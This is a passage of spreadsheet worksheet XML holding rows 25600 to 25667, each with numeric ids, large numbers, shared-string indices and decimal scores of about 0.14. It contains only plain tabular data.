      <c r="D25600" s="2">
        <v>1.0</v>
      </c>
      <c r="E25600" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25600" s="2">
        <v>0.1397569444444445</v>
      </c>
    </row>
    <row r="25601" ht="15.75" customHeight="1">
      <c r="A25601" s="1">
        <v>20963.0</v>
      </c>
      <c r="B25601" s="2">
        <v>1.6720065E7</v>
      </c>
      <c r="C25601" s="2" t="s">
        <v>24622</v>
      </c>
      <c r="D25601" s="2">
        <v>1.0</v>
      </c>
      <c r="E25601" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25601" s="2">
        <v>0.139344262295082</v>
      </c>
    </row>
    <row r="25602" ht="15.75" customHeight="1">
      <c r="A25602" s="1">
        <v>31513.0</v>
      </c>
      <c r="B25602" s="2">
        <v>5.0747869E7</v>
      </c>
      <c r="C25602" s="2" t="s">
        <v>24623</v>
      </c>
      <c r="D25602" s="2">
        <v>1.0</v>
      </c>
      <c r="E25602" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25602" s="2">
        <v>0.139344262295082</v>
      </c>
    </row>
    <row r="25603" ht="15.75" customHeight="1">
      <c r="A25603" s="1">
        <v>6896.0</v>
      </c>
      <c r="B25603" s="2">
        <v>4.9796523E7</v>
      </c>
      <c r="C25603" s="2" t="s">
        <v>24624</v>
      </c>
      <c r="D25603" s="2">
        <v>1.0</v>
      </c>
      <c r="E25603" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25603" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="25604" ht="15.75" customHeight="1">
      <c r="A25604" s="1">
        <v>19753.0</v>
      </c>
      <c r="B25604" s="2">
        <v>5.6705061E7</v>
      </c>
      <c r="C25604" s="2" t="s">
        <v>24625</v>
      </c>
      <c r="D25604" s="2">
        <v>1.0</v>
      </c>
      <c r="E25604" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25604" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="25605" ht="15.75" customHeight="1">
      <c r="A25605" s="1">
        <v>22174.0</v>
      </c>
      <c r="B25605" s="2">
        <v>3.1649716E7</v>
      </c>
      <c r="C25605" s="2" t="s">
        <v>24626</v>
      </c>
      <c r="D25605" s="2">
        <v>1.0</v>
      </c>
      <c r="E25605" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25605" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="25606" ht="15.75" customHeight="1">
      <c r="A25606" s="1">
        <v>28528.0</v>
      </c>
      <c r="B25606" s="2">
        <v>2.6757394E7</v>
      </c>
      <c r="C25606" s="2" t="s">
        <v>24627</v>
      </c>
      <c r="D25606" s="2">
        <v>1.0</v>
      </c>
      <c r="E25606" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25606" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="25607" ht="15.75" customHeight="1">
      <c r="A25607" s="1">
        <v>6271.0</v>
      </c>
      <c r="B25607" s="2">
        <v>4.8129662E7</v>
      </c>
      <c r="C25607" s="2" t="s">
        <v>24628</v>
      </c>
      <c r="D25607" s="2">
        <v>1.0</v>
      </c>
      <c r="E25607" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25607" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="25608" ht="15.75" customHeight="1">
      <c r="A25608" s="1">
        <v>6980.0</v>
      </c>
      <c r="B25608" s="2">
        <v>5.0030166E7</v>
      </c>
      <c r="C25608" s="2" t="s">
        <v>24629</v>
      </c>
      <c r="D25608" s="2">
        <v>1.0</v>
      </c>
      <c r="E25608" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25608" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="25609" ht="15.75" customHeight="1">
      <c r="A25609" s="1">
        <v>27266.0</v>
      </c>
      <c r="B25609" s="2">
        <v>2.1171644E7</v>
      </c>
      <c r="C25609" s="2" t="s">
        <v>24630</v>
      </c>
      <c r="D25609" s="2">
        <v>1.0</v>
      </c>
      <c r="E25609" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25609" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="25610" ht="15.75" customHeight="1">
      <c r="A25610" s="1">
        <v>27562.0</v>
      </c>
      <c r="B25610" s="2">
        <v>2.242347E7</v>
      </c>
      <c r="C25610" s="2" t="s">
        <v>24631</v>
      </c>
      <c r="D25610" s="2">
        <v>1.0</v>
      </c>
      <c r="E25610" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25610" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="25611" ht="15.75" customHeight="1">
      <c r="A25611" s="1">
        <v>24803.0</v>
      </c>
      <c r="B25611" s="2">
        <v>1.2026144E7</v>
      </c>
      <c r="C25611" s="2" t="s">
        <v>24632</v>
      </c>
      <c r="D25611" s="2">
        <v>1.0</v>
      </c>
      <c r="E25611" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25611" s="2">
        <v>0.1384742951907131</v>
      </c>
    </row>
    <row r="25612" ht="15.75" customHeight="1">
      <c r="A25612" s="1">
        <v>29988.0</v>
      </c>
      <c r="B25612" s="2">
        <v>3611413.0</v>
      </c>
      <c r="C25612" s="2" t="s">
        <v>24633</v>
      </c>
      <c r="D25612" s="2">
        <v>1.0</v>
      </c>
      <c r="E25612" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25612" s="2">
        <v>0.1384742951907131</v>
      </c>
    </row>
    <row r="25613" ht="15.75" customHeight="1">
      <c r="A25613" s="1">
        <v>25050.0</v>
      </c>
      <c r="B25613" s="2">
        <v>1.2866302E7</v>
      </c>
      <c r="C25613" s="2" t="s">
        <v>24634</v>
      </c>
      <c r="D25613" s="2">
        <v>1.0</v>
      </c>
      <c r="E25613" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25613" s="2">
        <v>0.1384479717813052</v>
      </c>
    </row>
    <row r="25614" ht="15.75" customHeight="1">
      <c r="A25614" s="1">
        <v>5608.0</v>
      </c>
      <c r="B25614" s="2">
        <v>4.614432E7</v>
      </c>
      <c r="C25614" s="2" t="s">
        <v>24635</v>
      </c>
      <c r="D25614" s="2">
        <v>1.0</v>
      </c>
      <c r="E25614" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25614" s="2">
        <v>0.1384259259259259</v>
      </c>
    </row>
    <row r="25615" ht="15.75" customHeight="1">
      <c r="A25615" s="1">
        <v>2390.0</v>
      </c>
      <c r="B25615" s="2">
        <v>3.3343273E7</v>
      </c>
      <c r="C25615" s="2" t="s">
        <v>24636</v>
      </c>
      <c r="D25615" s="2">
        <v>1.0</v>
      </c>
      <c r="E25615" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25615" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="25616" ht="15.75" customHeight="1">
      <c r="A25616" s="1">
        <v>3715.0</v>
      </c>
      <c r="B25616" s="2">
        <v>3.9606364E7</v>
      </c>
      <c r="C25616" s="2" t="s">
        <v>24637</v>
      </c>
      <c r="D25616" s="2">
        <v>1.0</v>
      </c>
      <c r="E25616" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25616" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="25617" ht="15.75" customHeight="1">
      <c r="A25617" s="1">
        <v>10391.0</v>
      </c>
      <c r="B25617" s="2">
        <v>8768184.0</v>
      </c>
      <c r="C25617" s="2" t="s">
        <v>24638</v>
      </c>
      <c r="D25617" s="2">
        <v>1.0</v>
      </c>
      <c r="E25617" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25617" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="25618" ht="15.75" customHeight="1">
      <c r="A25618" s="1">
        <v>11842.0</v>
      </c>
      <c r="B25618" s="2">
        <v>2.4715438E7</v>
      </c>
      <c r="C25618" s="2" t="s">
        <v>24639</v>
      </c>
      <c r="D25618" s="2">
        <v>1.0</v>
      </c>
      <c r="E25618" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25618" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="25619" ht="15.75" customHeight="1">
      <c r="A25619" s="1">
        <v>24857.0</v>
      </c>
      <c r="B25619" s="2">
        <v>1.2207463E7</v>
      </c>
      <c r="C25619" s="2" t="s">
        <v>24640</v>
      </c>
      <c r="D25619" s="2">
        <v>1.0</v>
      </c>
      <c r="E25619" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25619" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="25620" ht="15.75" customHeight="1">
      <c r="A25620" s="1">
        <v>27904.0</v>
      </c>
      <c r="B25620" s="2">
        <v>2.3677848E7</v>
      </c>
      <c r="C25620" s="2" t="s">
        <v>24641</v>
      </c>
      <c r="D25620" s="2">
        <v>1.0</v>
      </c>
      <c r="E25620" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25620" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="25621" ht="15.75" customHeight="1">
      <c r="A25621" s="1">
        <v>30678.0</v>
      </c>
      <c r="B25621" s="2">
        <v>4.232772E7</v>
      </c>
      <c r="C25621" s="2" t="s">
        <v>24641</v>
      </c>
      <c r="D25621" s="2">
        <v>1.0</v>
      </c>
      <c r="E25621" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25621" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="25622" ht="15.75" customHeight="1">
      <c r="A25622" s="1">
        <v>31260.0</v>
      </c>
      <c r="B25622" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C25622" s="2" t="s">
        <v>24642</v>
      </c>
      <c r="D25622" s="2">
        <v>1.0</v>
      </c>
      <c r="E25622" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25622" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="25623" ht="15.75" customHeight="1">
      <c r="A25623" s="1">
        <v>1637.0</v>
      </c>
      <c r="B25623" s="2">
        <v>2.8004205E7</v>
      </c>
      <c r="C25623" s="2" t="s">
        <v>24643</v>
      </c>
      <c r="D25623" s="2">
        <v>1.0</v>
      </c>
      <c r="E25623" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25623" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="25624" ht="15.75" customHeight="1">
      <c r="A25624" s="1">
        <v>14690.0</v>
      </c>
      <c r="B25624" s="2">
        <v>4.05344E7</v>
      </c>
      <c r="C25624" s="2" t="s">
        <v>24644</v>
      </c>
      <c r="D25624" s="2">
        <v>1.0</v>
      </c>
      <c r="E25624" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25624" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="25625" ht="15.75" customHeight="1">
      <c r="A25625" s="1">
        <v>15787.0</v>
      </c>
      <c r="B25625" s="2">
        <v>4.4202368E7</v>
      </c>
      <c r="C25625" s="2" t="s">
        <v>24645</v>
      </c>
      <c r="D25625" s="2">
        <v>1.0</v>
      </c>
      <c r="E25625" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25625" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="25626" ht="15.75" customHeight="1">
      <c r="A25626" s="1">
        <v>20564.0</v>
      </c>
      <c r="B25626" s="2">
        <v>1.3426885E7</v>
      </c>
      <c r="C25626" s="2" t="s">
        <v>24646</v>
      </c>
      <c r="D25626" s="2">
        <v>1.0</v>
      </c>
      <c r="E25626" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25626" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="25627" ht="15.75" customHeight="1">
      <c r="A25627" s="1">
        <v>24521.0</v>
      </c>
      <c r="B25627" s="2">
        <v>1.1164489E7</v>
      </c>
      <c r="C25627" s="2" t="s">
        <v>24647</v>
      </c>
      <c r="D25627" s="2">
        <v>1.0</v>
      </c>
      <c r="E25627" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25627" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="25628" ht="15.75" customHeight="1">
      <c r="A25628" s="1">
        <v>25259.0</v>
      </c>
      <c r="B25628" s="2">
        <v>1.3388721E7</v>
      </c>
      <c r="C25628" s="2" t="s">
        <v>24648</v>
      </c>
      <c r="D25628" s="2">
        <v>1.0</v>
      </c>
      <c r="E25628" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25628" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="25629" ht="15.75" customHeight="1">
      <c r="A25629" s="1">
        <v>27941.0</v>
      </c>
      <c r="B25629" s="2">
        <v>2.3843495E7</v>
      </c>
      <c r="C25629" s="2" t="s">
        <v>24649</v>
      </c>
      <c r="D25629" s="2">
        <v>1.0</v>
      </c>
      <c r="E25629" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25629" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="25630" ht="15.75" customHeight="1">
      <c r="A25630" s="1">
        <v>27966.0</v>
      </c>
      <c r="B25630" s="2">
        <v>2.3928196E7</v>
      </c>
      <c r="C25630" s="2" t="s">
        <v>24650</v>
      </c>
      <c r="D25630" s="2">
        <v>1.0</v>
      </c>
      <c r="E25630" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25630" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="25631" ht="15.75" customHeight="1">
      <c r="A25631" s="1">
        <v>32482.0</v>
      </c>
      <c r="B25631" s="2">
        <v>5697227.0</v>
      </c>
      <c r="C25631" s="2" t="s">
        <v>24651</v>
      </c>
      <c r="D25631" s="2">
        <v>1.0</v>
      </c>
      <c r="E25631" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25631" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="25632" ht="15.75" customHeight="1">
      <c r="A25632" s="1">
        <v>32712.0</v>
      </c>
      <c r="B25632" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C25632" s="2" t="s">
        <v>24652</v>
      </c>
      <c r="D25632" s="2">
        <v>1.0</v>
      </c>
      <c r="E25632" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25632" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="25633" ht="15.75" customHeight="1">
      <c r="A25633" s="1">
        <v>32754.0</v>
      </c>
      <c r="B25633" s="2">
        <v>6053851.0</v>
      </c>
      <c r="C25633" s="2" t="s">
        <v>24653</v>
      </c>
      <c r="D25633" s="2">
        <v>1.0</v>
      </c>
      <c r="E25633" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25633" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="25634" ht="15.75" customHeight="1">
      <c r="A25634" s="1">
        <v>33809.0</v>
      </c>
      <c r="B25634" s="2">
        <v>8868875.0</v>
      </c>
      <c r="C25634" s="2" t="s">
        <v>24654</v>
      </c>
      <c r="D25634" s="2">
        <v>1.0</v>
      </c>
      <c r="E25634" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25634" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="25635" ht="15.75" customHeight="1">
      <c r="A25635" s="1">
        <v>34058.0</v>
      </c>
      <c r="B25635" s="2">
        <v>9597840.0</v>
      </c>
      <c r="C25635" s="2" t="s">
        <v>24655</v>
      </c>
      <c r="D25635" s="2">
        <v>1.0</v>
      </c>
      <c r="E25635" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25635" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="25636" ht="15.75" customHeight="1">
      <c r="A25636" s="1">
        <v>34231.0</v>
      </c>
      <c r="B25636" s="2">
        <v>4729709.0</v>
      </c>
      <c r="C25636" s="2" t="s">
        <v>24656</v>
      </c>
      <c r="D25636" s="2">
        <v>1.0</v>
      </c>
      <c r="E25636" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25636" s="2">
        <v>0.1383838383838384</v>
      </c>
    </row>
    <row r="25637" ht="15.75" customHeight="1">
      <c r="A25637" s="1">
        <v>20398.0</v>
      </c>
      <c r="B25637" s="2">
        <v>1.2168682E7</v>
      </c>
      <c r="C25637" s="2" t="s">
        <v>24657</v>
      </c>
      <c r="D25637" s="2">
        <v>1.0</v>
      </c>
      <c r="E25637" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25637" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="25638" ht="15.75" customHeight="1">
      <c r="A25638" s="1">
        <v>11000.0</v>
      </c>
      <c r="B25638" s="2">
        <v>1.7648132E7</v>
      </c>
      <c r="C25638" s="2" t="s">
        <v>24658</v>
      </c>
      <c r="D25638" s="2">
        <v>1.0</v>
      </c>
      <c r="E25638" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25638" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="25639" ht="15.75" customHeight="1">
      <c r="A25639" s="1">
        <v>26235.0</v>
      </c>
      <c r="B25639" s="2">
        <v>1.6282675E7</v>
      </c>
      <c r="C25639" s="2" t="s">
        <v>24659</v>
      </c>
      <c r="D25639" s="2">
        <v>1.0</v>
      </c>
      <c r="E25639" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25639" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="25640" ht="15.75" customHeight="1">
      <c r="A25640" s="1">
        <v>26639.0</v>
      </c>
      <c r="B25640" s="2">
        <v>1.8046118E7</v>
      </c>
      <c r="C25640" s="2" t="s">
        <v>24660</v>
      </c>
      <c r="D25640" s="2">
        <v>1.0</v>
      </c>
      <c r="E25640" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25640" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="25641" ht="15.75" customHeight="1">
      <c r="A25641" s="1">
        <v>32634.0</v>
      </c>
      <c r="B25641" s="2">
        <v>5857361.0</v>
      </c>
      <c r="C25641" s="2" t="s">
        <v>24661</v>
      </c>
      <c r="D25641" s="2">
        <v>1.0</v>
      </c>
      <c r="E25641" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25641" s="2">
        <v>0.1375968992248062</v>
      </c>
    </row>
    <row r="25642" ht="15.75" customHeight="1">
      <c r="A25642" s="1">
        <v>4240.0</v>
      </c>
      <c r="B25642" s="2">
        <v>4.1787731E7</v>
      </c>
      <c r="C25642" s="2" t="s">
        <v>24662</v>
      </c>
      <c r="D25642" s="2">
        <v>1.0</v>
      </c>
      <c r="E25642" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25642" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="25643" ht="15.75" customHeight="1">
      <c r="A25643" s="1">
        <v>22435.0</v>
      </c>
      <c r="B25643" s="2">
        <v>3.6207908E7</v>
      </c>
      <c r="C25643" s="2" t="s">
        <v>24663</v>
      </c>
      <c r="D25643" s="2">
        <v>1.0</v>
      </c>
      <c r="E25643" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25643" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="25644" ht="15.75" customHeight="1">
      <c r="A25644" s="1">
        <v>15505.0</v>
      </c>
      <c r="B25644" s="2">
        <v>4.3216474E7</v>
      </c>
      <c r="C25644" s="2" t="s">
        <v>24664</v>
      </c>
      <c r="D25644" s="2">
        <v>1.0</v>
      </c>
      <c r="E25644" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25644" s="2">
        <v>0.1374269005847953</v>
      </c>
    </row>
    <row r="25645" ht="15.75" customHeight="1">
      <c r="A25645" s="1">
        <v>32351.0</v>
      </c>
      <c r="B25645" s="2">
        <v>5591968.0</v>
      </c>
      <c r="C25645" s="2" t="s">
        <v>24665</v>
      </c>
      <c r="D25645" s="2">
        <v>1.0</v>
      </c>
      <c r="E25645" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25645" s="2">
        <v>0.1370370370370371</v>
      </c>
    </row>
    <row r="25646" ht="15.75" customHeight="1">
      <c r="A25646" s="1">
        <v>7745.0</v>
      </c>
      <c r="B25646" s="2">
        <v>5.2057658E7</v>
      </c>
      <c r="C25646" s="2" t="s">
        <v>24666</v>
      </c>
      <c r="D25646" s="2">
        <v>1.0</v>
      </c>
      <c r="E25646" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25646" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="25647" ht="15.75" customHeight="1">
      <c r="A25647" s="1">
        <v>8502.0</v>
      </c>
      <c r="B25647" s="2">
        <v>5.404648E7</v>
      </c>
      <c r="C25647" s="2" t="s">
        <v>24667</v>
      </c>
      <c r="D25647" s="2">
        <v>1.0</v>
      </c>
      <c r="E25647" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25647" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="25648" ht="15.75" customHeight="1">
      <c r="A25648" s="1">
        <v>22348.0</v>
      </c>
      <c r="B25648" s="2">
        <v>3.4560577E7</v>
      </c>
      <c r="C25648" s="2" t="s">
        <v>24668</v>
      </c>
      <c r="D25648" s="2">
        <v>1.0</v>
      </c>
      <c r="E25648" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25648" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="25649" ht="15.75" customHeight="1">
      <c r="A25649" s="1">
        <v>33469.0</v>
      </c>
      <c r="B25649" s="2">
        <v>7969459.0</v>
      </c>
      <c r="C25649" s="2" t="s">
        <v>24602</v>
      </c>
      <c r="D25649" s="2">
        <v>1.0</v>
      </c>
      <c r="E25649" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25649" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="25650" ht="15.75" customHeight="1">
      <c r="A25650" s="1">
        <v>3349.0</v>
      </c>
      <c r="B25650" s="2">
        <v>3.776189E7</v>
      </c>
      <c r="C25650" s="2" t="s">
        <v>24669</v>
      </c>
      <c r="D25650" s="2">
        <v>1.0</v>
      </c>
      <c r="E25650" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25650" s="2">
        <v>0.13681592039801</v>
      </c>
    </row>
    <row r="25651" ht="15.75" customHeight="1">
      <c r="A25651" s="1">
        <v>1161.0</v>
      </c>
      <c r="B25651" s="2">
        <v>2.4479214E7</v>
      </c>
      <c r="C25651" s="2" t="s">
        <v>24670</v>
      </c>
      <c r="D25651" s="2">
        <v>1.0</v>
      </c>
      <c r="E25651" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25651" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="25652" ht="15.75" customHeight="1">
      <c r="A25652" s="1">
        <v>27014.0</v>
      </c>
      <c r="B25652" s="2">
        <v>2.0013877E7</v>
      </c>
      <c r="C25652" s="2" t="s">
        <v>24671</v>
      </c>
      <c r="D25652" s="2">
        <v>1.0</v>
      </c>
      <c r="E25652" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25652" s="2">
        <v>0.1363636363636364</v>
      </c>
    </row>
    <row r="25653" ht="15.75" customHeight="1">
      <c r="A25653" s="1">
        <v>17778.0</v>
      </c>
      <c r="B25653" s="2">
        <v>5.0771304E7</v>
      </c>
      <c r="C25653" s="2" t="s">
        <v>24672</v>
      </c>
      <c r="D25653" s="2">
        <v>1.0</v>
      </c>
      <c r="E25653" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25653" s="2">
        <v>0.1362847222222223</v>
      </c>
    </row>
    <row r="25654" ht="15.75" customHeight="1">
      <c r="A25654" s="1">
        <v>21856.0</v>
      </c>
      <c r="B25654" s="2">
        <v>2.7210848E7</v>
      </c>
      <c r="C25654" s="2" t="s">
        <v>24673</v>
      </c>
      <c r="D25654" s="2">
        <v>1.0</v>
      </c>
      <c r="E25654" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25654" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="25655" ht="15.75" customHeight="1">
      <c r="A25655" s="1">
        <v>24634.0</v>
      </c>
      <c r="B25655" s="2">
        <v>1.1478E7</v>
      </c>
      <c r="C25655" s="2" t="s">
        <v>24674</v>
      </c>
      <c r="D25655" s="2">
        <v>1.0</v>
      </c>
      <c r="E25655" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25655" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="25656" ht="15.75" customHeight="1">
      <c r="A25656" s="1">
        <v>25698.0</v>
      </c>
      <c r="B25656" s="2">
        <v>1.4529134E7</v>
      </c>
      <c r="C25656" s="2" t="s">
        <v>24619</v>
      </c>
      <c r="D25656" s="2">
        <v>1.0</v>
      </c>
      <c r="E25656" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25656" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="25657" ht="15.75" customHeight="1">
      <c r="A25657" s="1">
        <v>26810.0</v>
      </c>
      <c r="B25657" s="2">
        <v>1.8734068E7</v>
      </c>
      <c r="C25657" s="2" t="s">
        <v>24675</v>
      </c>
      <c r="D25657" s="2">
        <v>1.0</v>
      </c>
      <c r="E25657" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25657" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="25658" ht="15.75" customHeight="1">
      <c r="A25658" s="1">
        <v>655.0</v>
      </c>
      <c r="B25658" s="2">
        <v>1.9991823E7</v>
      </c>
      <c r="C25658" s="2" t="s">
        <v>24676</v>
      </c>
      <c r="D25658" s="2">
        <v>1.0</v>
      </c>
      <c r="E25658" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25658" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25659" ht="15.75" customHeight="1">
      <c r="A25659" s="1">
        <v>8203.0</v>
      </c>
      <c r="B25659" s="2">
        <v>5.3287731E7</v>
      </c>
      <c r="C25659" s="2" t="s">
        <v>24677</v>
      </c>
      <c r="D25659" s="2">
        <v>1.0</v>
      </c>
      <c r="E25659" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25659" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25660" ht="15.75" customHeight="1">
      <c r="A25660" s="1">
        <v>17435.0</v>
      </c>
      <c r="B25660" s="2">
        <v>4.9737928E7</v>
      </c>
      <c r="C25660" s="2" t="s">
        <v>24678</v>
      </c>
      <c r="D25660" s="2">
        <v>1.0</v>
      </c>
      <c r="E25660" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25660" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25661" ht="15.75" customHeight="1">
      <c r="A25661" s="1">
        <v>21228.0</v>
      </c>
      <c r="B25661" s="2">
        <v>1.9640835E7</v>
      </c>
      <c r="C25661" s="2" t="s">
        <v>24679</v>
      </c>
      <c r="D25661" s="2">
        <v>1.0</v>
      </c>
      <c r="E25661" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25661" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25662" ht="15.75" customHeight="1">
      <c r="A25662" s="1">
        <v>21310.0</v>
      </c>
      <c r="B25662" s="2">
        <v>2.0788301E7</v>
      </c>
      <c r="C25662" s="2" t="s">
        <v>24680</v>
      </c>
      <c r="D25662" s="2">
        <v>1.0</v>
      </c>
      <c r="E25662" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25662" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25663" ht="15.75" customHeight="1">
      <c r="A25663" s="1">
        <v>24923.0</v>
      </c>
      <c r="B25663" s="2">
        <v>1.2400762E7</v>
      </c>
      <c r="C25663" s="2" t="s">
        <v>24681</v>
      </c>
      <c r="D25663" s="2">
        <v>1.0</v>
      </c>
      <c r="E25663" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25663" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25664" ht="15.75" customHeight="1">
      <c r="A25664" s="1">
        <v>25017.0</v>
      </c>
      <c r="B25664" s="2">
        <v>1.2782006E7</v>
      </c>
      <c r="C25664" s="2" t="s">
        <v>24682</v>
      </c>
      <c r="D25664" s="2">
        <v>1.0</v>
      </c>
      <c r="E25664" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25664" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25665" ht="15.75" customHeight="1">
      <c r="A25665" s="1">
        <v>26362.0</v>
      </c>
      <c r="B25665" s="2">
        <v>1.6861717E7</v>
      </c>
      <c r="C25665" s="2" t="s">
        <v>24683</v>
      </c>
      <c r="D25665" s="2">
        <v>1.0</v>
      </c>
      <c r="E25665" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25665" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25666" ht="15.75" customHeight="1">
      <c r="A25666" s="1">
        <v>27153.0</v>
      </c>
      <c r="B25666" s="2">
        <v>2.07883E7</v>
      </c>
      <c r="C25666" s="2" t="s">
        <v>24680</v>
      </c>
      <c r="D25666" s="2">
        <v>1.0</v>
      </c>
      <c r="E25666" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25666" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25667" ht="15.75" customHeight="1">
      <c r="A25667" s="1">
        <v>29224.0</v>
      </c>
      <c r="B25667" s="2">
        <v>3.0827792E7</v>
      </c>
      <c r="C25667" s="2" t="s">
        <v>24684</v>
      </c>
      <c r="D25667" s="2">
        <v>1.0</v>
      </c>
